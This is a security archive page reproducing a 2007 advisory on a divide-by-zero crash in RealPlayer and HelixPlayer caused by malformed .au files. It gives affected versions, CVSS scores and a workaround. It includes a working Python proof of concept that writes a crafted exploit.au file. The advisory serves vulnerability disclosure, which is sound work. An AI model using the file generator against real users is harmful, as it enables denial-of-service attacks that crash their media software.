exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OS2A_1010.txt

OS2A_1010.txt
Posted Sep 11, 2007
Authored by Arun Kethipelly, Nagendra Kumar G, Chandan S

A denial of service flaw exists in RealPlayer and HelixPlayer when a user tries to open a malformed .au file. The flaw is due to a Division by Zero error when processing a malformed AU file. An attacker must entice an unsuspecting user to open a maliciously crafted AU file. Realplayer versions 10.1.0.3114 and below and Helixplayer version 1.0.6.778 are affected. Proof of concept included.

tags | exploit, denial of service, proof of concept
SHA-256 | 28be1324049b26d3f596b6ba348ac009e99f312a5179e495cba05ab6a4852baa

OS2A_1010.txt

Change Mirror Download
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability


OS2A ID: OS2A_1010 08/21/2007 Issue Discovered
08/31/2007 Vendor Notification

Class: Denial of Service Severity: High


Overview:
-------------
RealPlayer/Helix Player is a media player that will play popular media formats
as well as organize your music and videos.


Description:
--------------
A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user
tries to open a malformed .au file. The flaw is due to a Division by Zero error
when processing a malformed AU file.

An attacker must entice an unsuspecting user to open a maliciously crafted AU
file.


Impact:
--------
Successful exploitation allows an attacker to crash a vulnerable application
via a specially crafted file. (Deny the service).


Affected Software(s):
---------------------
Realplayer 10.1.0.3114 and prior
Helixplayer

Tested on :
- RealPlayer-10.1.0.3114
- Realplayer-10.0.9
- Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively
- Realplayer10-5Gold on Windows XP
- HelixPlayer-1.0.6.778 on FC6

AV MP3 Player and Media Player Classic are also found to be vulnerable


Affected Platform:
------------------
Microsoft Windows (All Platform)
RedHat Linux
Fedora Core Linux
SuSE Linux


Proof of Concept:
------------------
The following Python program will generate a malformed .au file

import sys
import os

head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+

"\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +

"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")

print "[x] RealPlayer/Helix Player/Kaboodle Player DoS"

try:
f = open("exploit.au",'w')
except IOError, e:
print "Unable to open file ", e
sys.exit(0)

print "[x] File successfully opened for writing."
try:
f.write(head)
except IOError, e:
print "Unable to write to file ", e
sys.exit(0)
print "[x] File successfully written."
f.close()
print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players."

#End of program

RealPlayer crashes with the following exception,
Floating point exception$REALPLAYBIN "$@"

CVSS Score Report:
------------------
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
CVSS Temporal Score = 6.4
Risk factor = High

Reference:
-----------
A similar attack was found recently against Windows Media Player,
http://www.safehack.com/exp/mp/mplayer11.txt

Solution/Work Around:
--------------------
Do not open untrusted .au files.

Credits:
--------
Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this
vulnerability.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close